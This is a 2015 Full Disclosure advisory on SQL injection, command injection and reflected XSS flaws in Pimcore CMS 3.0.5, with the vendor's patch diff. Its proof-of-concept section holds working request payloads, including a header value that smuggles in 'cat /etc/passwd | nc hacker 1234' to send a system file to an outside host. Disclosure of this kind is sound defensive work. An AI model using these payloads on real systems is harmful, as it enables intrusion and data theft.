[prev in list] [next in list] [prev in thread] [next in thread]
List: full-disclosure
Subject: [FD] Pimcore v3.0.5 CMS - Multiple Web Vulnerabilities
From: Vulnerability Lab <research () vulnerability-lab ! com>
Date: 2015-05-08 13:52:12
Message-ID: 554CBF8C.40403 () vulnerability-lab ! com
[Download RAW message or body]
Document Title:
==============Pimcore v3.0.5 CMS - Multiple Web Vulnerabilities
References (Source):
===================http://www.vulnerability-lab.com/get_content.php?id�82
Release Date:
============2015-05-08
Vulnerability Laboratory ID (VL-ID):
===================================1482
Common Vulnerability Scoring System:
===================================6.2
Product & Service Introduction:
==============================Pimcore is a powerful and robust Zend Framework based PHP content \
management system (CMS) for creating and managing digital content and assets licensed under the \
open-source BSD license. Create outstanding digital experiences on the most flexible content \
management platform available. Manage and edit any type of digital content, for any device and \
channel in a 100% flexible and personalized way. Pimcore features award-winning single-source \
and multi-channel publishing functionality making it easy to manage, update, and integrate \
content and data from various sources. With pimcore brands can create and manage rich digital \
experiences for all of their output channels at once: web, mobile, apps, social platforms, \
print and digital signage. With pimcore you can truly `edit once & reuse anywhere`.
(Copy of the Homepage: https://www.pimcore.org/ )
Abstract Advisory Information:
=============================An independent vulnerability laboratory researcher discovered \
multiple vulnerabilities in the official PIM Core v3.0.5 Content Management System.
Vulnerability Disclosure Timeline:
=================================2015-05-01: Researcher Notification & Coordination (Alain \
Homewood - PwC New Zealand)
2015-05-01: Vendor Notification (PimCore CMS Security Team)
2015-05-05: Vendor Response/Feedback (PimCore CMS Security Team)
2015-05-07: Vendor Fix/Patch (PimCore Developer Team)
2015-05-08: Public Disclosure (Vulnerability Laboratory - Alain Homewood)
Discovery Status:
================Published
Affected Product(s):
===================Pimcore GmbH
Product: PimCore - Content Management System 3.0.5
Exploitation Technique:
======================Remote
Severity Level:
==============High
Technical Details & Description:
===============================1.1
A (time-based) blind sql injection web vulnerability has been discovered in the official \
Pimcore v3.0.5 Content Management System (web-application). The vulnerability allows remote \
attackers or privileged user accounts to execute own sql commands to compromise the affected \
web-server dbms.
A blind authenticated SQL injection vulnerability exists in the filtering functionality of the \
HTTP error display in the administration panel. Authenticated is required to exploit this \
vulnerability, however low privilege users may have access to this functionality (i.e. its \
located under `Marketing - Search Engine Optimisation`). The request method to execute the \
malicious sql commands is GET and the issue is exists in the code line of the web-application.
The security risk of the sql vulnerability is estimated as high with a cvss (common \
vulnerability scoring system) count of 6.2. Exploitation of the remote sql injection web \
vulnerability requires a low privilege application user account without user interaction. \
Successful exploitation of the sql injection vulnerability results in application and \
web-service or dbms compromise.
Request Method(s):
[+] GET
Vulnerable Module(s):
[+] ./misc/http-error-log
Vulnerable Parameter(s):
[+] _dc
1.2
A command execution web vulnerability has been discovered in the official Pimcore v3.0.5 \
Content Management System (web-application). The vulnerability allows remote attackers or local \
privilege user accounts to compromise the web-server by execution of malicious code.
The newsletter sending functionality uses unsanitized user provided input as part of a shell \
command. Authenticated users can manipulate these values to execute arbitrary commands. Note \
that low privilege users are likely to have access to this functionality (e.g. marketing \
users). Authenticated is required to exploit this vulnerability. The request method to execute \
is POST and the attack vector is located on the application-side of the online service.
The security risk of the arbitrary code execution vulnerability is estimated as high with a \
cvss (common vulnerability scoring system) count of 6.1. Exploitation of the arbitrary code \
execution vulnerability requires no user interaction but a low privilege web-application user \
account. Successful exploitation of the remote vulnerability results in unauthorized execution \
of system specific codes.
Request Method(s):
[+] POST
Vulnerable Module(s):
[+] /reports/newsletter/send
Vulnerable Parameter(s):
[+] HOST
1.3
Two reflected cross site scripting web vulnerability has been discovered in the official \
Pimcore v3.0.5 Content Management System (web-application). The vulnerability allows remote \
attackers to inject own script code on the client-side to the user (browser) application \
requests.
Two reflected cross site scripting vulnerabilities exist in the administration panel. The \
issues are located in the `id` value of the echo back through the `exportClassAction()` and \
`exportCustomLayOutDefinitionAction()` functions of the `userClassController.php` file. The \
request method to execute is GET and the issues are located on the client-side of the \
online-service web application.
The security risk of the cross site scripting web vulnerabilities are estimated as medium with \
a cvss (common vulnerability scoring system) count of 3.2. Exploitation of the arbitrary code \
execution vulnerability requires no user interaction or privileged web-application user account \
with password. Successful exploitation of the vulnerability results in session hijacking, \
persistent phishing, persistent external redirects and persistent manipulation function or \
connected module context.
Request Method(s):
[+] GET
Vulnerable Module(s):
[+] exportClassAction()
[+] exportCustomLayOutDefinitionAction()
Vulnerable File(s):
[+] userClassController.php
Vulnerable Parameter(s):
[+] id
Proof of Concept (PoC):
======================1.1
The blind sql injection web vulnerability can be exploited by remote attackers with low \
privilege application user account and low user interaction. For security demonstration or to \
reproduce the vulnerability follow the provided information and steps below to continue.
Get requests to /admin/misc/http-error-log fail to sanitise the value of the "limit" parameter \
which allows users to inject SQL statements.
The unsanitized value of the parameter is included in the following SQL query in \
MiscController.php: $logs = $db->fetchAll("SELECT code,uri,`count`,date FROM http_error_log " . \
$condition . " ORDER BY " . $sort . " " . $dir . " LIMIT " . $offset . "," . $limit);
PoC or Exploitcode:
This vulnerability can be exploited with a time based technique as described on:
https://rateip.com/blog/sql-injections-in-mysql-limit-clause/
--- PoC Session Logs [GET] ---
GET /admin/misc/http-error-log?_dc�30255599566&limit \
%20PROCEDURE%20analyse((select%20extractvalue(rand(),concat(0x3a,(IF(MID(version(),1,1)%20LIKE%205,BENCHMARK(5000000,SHA1(1)),1))))),1)&filter= \
HTTP/1.1 Host: [VULNERABLE]
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-pimcore-csrf-token: 44efd8fe89806470db942bbb20ce1e6909eae4bc
X-Requested-With: XMLHttpRequest
Referer: http://[VULNERABLE]/admin/?_dc�30255468
Cookie: pimcore_admin_sid=llcv0iq3bthb6alpscnj401dc1
Connection: keep-alive
Reference(s):
admin/misc/http-error-log?_dc
1.2
The code execution web vulnerability can be exploited by remote attackers without privilege \
application user account or user interaction. For security demonstration or to reproduce the \
vulnerability follow the provided information and steps below to continue.
The users hostname is retrieved through $_SERVER['HTTP_X_FORWARDED_HOST'] or \
$_SERVER['HTTP_HOST'] and then included in a command that is executed \
(NewsletterController.php).
PoC: The command to be executed can be inserted into an X-forwarded-host HTTP header, for \
example:
--- PoC Session Logs [POST] ---
POST /admin/reports/newsletter/send HTTP/1.1
Host: 1[VULNERABLE]
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-pimcore-csrf-token: 44efd8fe89806470db942bbb20ce1e6909eae4bc
X-Requested-With: XMLHttpRequest
Referer: http://[VULNERABLE]/admin/?_dc�30259866451
Content-Length: 20
Cookie: pimcore_admin_sid=llcv0iq3bthb6alpscnj401dc1
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
X-forwarded-host: && cat /etc/passwd | nc hacker 1234
Reference(s):
/admin/reports/newsletter/send
1.3
The cross site scripting web vulnerabilities can be exploited by remote attackers with low \
privilege application user account and low user interaction. For security demonstration or to \
reproduce the vulnerability follow the provided information and steps below to continue.
Unsanitized user provided input in the "id" parameter is echoed back to the user in the \
exportClassAction() and exportCustomLayOutDefinitionAction() functions in \
userClassController.php.
Only authenticated users with permission to access the class export functionality are \
vulnerable to this (i.e. administrators)
PoC:
http://[VULNERABLE]/admin/class/export-class?id=<script>alert(1)</script>
http://[VULNERABLE]/admin/class/export-custom-layout-definition?id=<script>alert(1)</script>
Solution - Fix & Patch:
======================URL(s): \
https://github.com/pimcore/pimcore/commit/a01a4c87a782a7b20ccc4081c9340698f2d52573
pimcore/modules/admin/controllers/ClassController.php
@@ -484,10 +484,12 @@ public function getAllLayoutsAction() {
public function exportClassAction() {
$this->removeViewRenderer();
- $class = Object ClassDefinition::getById(intval($this->getParam(``id``)));
+
+ $id = intval($this->getParam(``id``));
+ $class = Object ClassDefinition::getById($id);
if (!$class instanceof Object ClassDefinition) {
- $errorMessage = ``: Class with id [ `` . $this->getParam(``id``) . `` not found. \
]``; + $errorMessage = ``: Class with id [ `` . $id . `` not found. ]``;
Logger::error($errorMessage);
echo $errorMessage;
} else {
@@ -496,14 +498,13 @@ public function exportClassAction() {
header(``Content-Disposition: attachment; filename= ``class_`` . $class->getName() \
. ``_export.json ````); echo $json;
}
-
}
public function exportCustomLayoutDefinitionAction() {
$this->removeViewRenderer();
- $id = $this->getParam(``id``);
+ $id = intval($this->getParam(``id``));
if ($id) {
$customLayout = Object ClassDefinition CustomLayout::getById($id);
pimcore/modules/reports/controllers/NewsletterController.php
@@ -185,7 +185,7 @@ public function sendAction() {
$letter = Newsletter Config::getByName($this->getParam(``name``));
if($letter) {
- $cmd = Tool Console::getPhpCli() . `` `` . realpath(PIMCORE_PATH . \
DIRECTORY_SEPARATOR . ``cli`` . DIRECTORY_SEPARATOR . ``send-newsletter.php``). `` `` . \
$letter->getName() . `` `` . Tool::getHostUrl(); + $cmd = Tool Console::getPhpCli() \
. `` `` . realpath(PIMCORE_PATH . DIRECTORY_SEPARATOR . ``cli`` . DIRECTORY_SEPARATOR . \
``send-newsletter.php``). `` `` . escapeshellarg($letter->getName()) . `` `` . \
escapeshellarg(Tool::getHostUrl());
Tool Console::execInBackground($cmd, PIMCORE_LOG_DIRECTORY . ``/newsletter--`` . \
$letter->getName() . ``.log``); }
pimcore/modules/admin/controllers/MiscController.php
@@ -325,8 +325,8 @@ public function httpErrorLogAction() {
$db = Resource::get();
- $limit = $this->getParam(``limit``);
- $offset = $this->getParam(``start``);
+ $limit = intval($this->getParam(``limit``));
+ $offset = intval($this->getParam(``start``));
$sort = $this->getParam(``sort``);
$dir = $this->getParam(``dir``);
$filter = $this->getParam(``filter``);
Security Risk:
=============1.1
The security risk of the blind sql injection web vulnerability in the pimcore cms is estimated \
as high. (CVSS 6.2)
1.2
The security risk of the code execution web vulnerability in the pimcore cms is estimated as \
high. (CVSS 6.1)
1.3
The security risk of the reflected cross site scripting web vulnerabilities in the pimcore cms \
are estimated as medium. (CVSS 3.2)
Credits & Authors:
=================Alain Homewood - PwC New Zealand \
(http://www.pwc.co.nz/services/assurance-services/pwc-security/)
Disclaimer & Information:
========================The information provided in this advisory is provided as it is without \
any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, \
including the warranties of merchantability and capability for a particular purpose. \
Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, \
indirect, incidental, consequential loss of business profits or special damages, even if \
Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some \
states do not allow the exclusion or limitation of liability for consequential or incidental \
damages so the foregoing limitation may not apply. We do not approve or encourage anybody to \
break any vendor licenses, policies, deface websites, hack into databases or trade with \
fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - \
admin@evolution-sec.com
Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - \
evolution-sec.com/contact
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - \
youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - \
vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php - \
vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/
Any modified copy or reproduction, including partially usages, of this file requires \
authorization from Vulnerability Laboratory. Permission to electronically redistribute this \
alert in its unmodified form is granted. All other rights, including the use of other media, \
are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, \
advisories, source code, videos and other information on this website is trademark of \
vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use \
or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to \
get a permission.
Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]â„¢
--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com
PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic